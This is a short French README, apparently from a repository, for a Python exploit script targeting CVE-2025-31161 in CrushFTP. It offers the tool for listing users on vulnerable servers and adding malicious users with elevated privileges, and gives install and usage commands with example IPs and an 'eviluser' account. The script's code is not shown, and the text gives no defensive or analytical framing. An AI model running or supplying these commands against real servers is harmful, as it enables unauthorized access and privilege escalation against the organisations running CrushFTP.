
Script d'exploitation Python pour CVE-2025-31161 ciblant CrushFTP. Énumère les utilisateurs et crée des comptes malveillants avec des privilèges élevés via des requêtes HTTP.
Ce dépôt contient un script Python pour interagir avec le service CrushFTP vulnérable à CVE-2025-31161 Le script permet de lister les utilisateurs existants et d'ajouter un utilisateur malveillant en exploitant la vulnérabilité.
requestspip install -r requirements.txt
python3 CVE-2025-31161.py listusers --ip <IP> --port <PORT>
python3 CVE-2025-31161.py adduser --ip <IP> --port <PORT> --valid_username <VALID_ADMIN> --username <NEW_USER> --password <PASSWORD>
python3 CVE-2025-31161.py listusers --ip 192.168.1.100 --port 80
python3 CVE-2025-31161.py adduser --ip 192.168.1.100 --port 8080 --username eviluser --password 1234